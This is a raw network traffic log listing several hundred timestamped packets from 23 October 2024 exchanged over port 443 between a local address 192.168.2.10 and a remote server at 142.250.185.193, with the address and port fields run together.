                                                                                                                        Oct 23, 2024 08:14:59.778146029 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.778171062 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.778217077 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.778234005 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.778279066 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.779189110 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.779206038 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.779288054 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.779295921 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.779346943 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.811817884 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.811841965 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.812594891 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.812612057 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.812654972 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.813023090 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.813041925 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.813116074 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.813116074 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.813127041 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.813169003 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.852854013 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.852880955 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.853029013 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.853040934 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.853079081 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.859777927 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.859806061 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.859882116 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.859885931 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.859925032 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.895544052 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.895584106 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.895730019 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.895739079 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.895797014 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.896387100 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.896403074 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.896693945 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.896702051 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.896826029 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.927656889 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.927681923 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.927788973 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.927798986 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.927839994 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.928587914 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.928613901 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.928663969 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.928669930 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.928703070 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.928864956 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.968741894 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.968767881 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.968900919 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.968919039 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.969069004 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.976758003 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.976775885 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.977030993 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:59.977055073 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:59.977205992 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.011215925 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.011238098 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.011389017 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.011404991 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.011528015 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.013034105 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.013053894 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.013173103 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.013180971 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.013262033 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.014183998 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.014199972 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.014282942 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.014297962 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.014417887 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.055447102 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.055552959 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.055617094 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.055653095 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.055660009 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.055697918 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.055733919 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.055771112 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.055828094 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.055835009 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.055967093 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.055994987 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056005955 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056015968 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.056024075 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056358099 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056380033 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.056385040 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056408882 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.056411982 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056421995 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056482077 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.056488991 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056528091 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.056648016 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056782961 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056806087 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056828976 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.056835890 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.056889057 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.057090998 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.057204962 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.057228088 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.057234049 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.057286024 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.057341099 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.057424068 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.057444096 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.057593107 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.057600975 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.057924986 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.085923910 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.086013079 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.086071014 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.086071014 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.086083889 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.086147070 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.087331057 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.087460995 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.087541103 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.087548018 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.093559027 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.093703032 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.093750954 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.093774080 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.093780994 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.093805075 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.093911886 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.093969107 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.093976021 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094088078 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094147921 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.094155073 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094268084 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094293118 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094315052 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.094321966 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094371080 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.094479084 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094564915 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094610929 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.094616890 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094744921 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094768047 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094794035 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.094799995 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.094870090 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.094985962 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.095139027 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.095165014 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.095184088 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.095191002 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.095232964 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.128210068 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.128611088 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.128662109 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.128669977 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.128806114 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.128834963 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.128863096 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.128869057 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.128905058 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.129904985 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130048037 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130095005 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.130100965 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130127907 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130187988 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.130193949 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130459070 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130507946 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130532026 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.130537987 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130572081 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.130582094 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130745888 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130772114 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130780935 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.130786896 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.130831957 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.130837917 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.131030083 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.131077051 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.131083012 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.131279945 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.131337881 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.131345034 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.131443977 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.131473064 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.131488085 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.131493092 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.132360935 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.172743082 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.172847033 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.172904968 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.172913074 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.172971964 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173012972 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.173019886 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173182011 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173208952 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173232079 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.173238039 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173274994 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.173302889 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173427105 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173501015 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.173507929 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173625946 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173666000 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173674107 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.173681021 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173718929 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.173890114 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173945904 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.173979998 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.173988104 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174159050 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174201965 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.174210072 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174309969 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174351931 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.174360991 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174499989 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174530029 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174542904 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.174549103 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174700975 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.174705982 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174874067 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.174948931 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.174957037 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.203165054 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.203223944 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.203241110 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.203259945 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.203332901 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.203340054 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.204590082 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.204674959 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.204680920 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.204710007 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.204837084 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.204844952 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.210809946 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.210881948 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.210913897 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.210922003 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.210963964 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.210969925 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211000919 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211044073 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.211051941 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211154938 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211210966 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.211218119 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211451054 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211497068 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.211503983 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211632967 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211662054 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211683989 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.211692095 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211733103 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.211796999 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211920023 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.211960077 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.211966038 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.212054014 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.212100029 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.212105989 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.212217093 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.212253094 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.212265015 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.212271929 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.212318897 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.212387085 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.245546103 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.245620012 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.245702982 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.245726109 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.245747089 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.245767117 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.245876074 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.245919943 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.245928049 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247226000 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247283936 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.247292042 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247361898 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247570992 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247572899 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.247584105 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247626066 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.247633934 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247759104 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247798920 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:15:00.247805119 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:00.247879982 CEST44349778142.250.185.193192.168.2.10
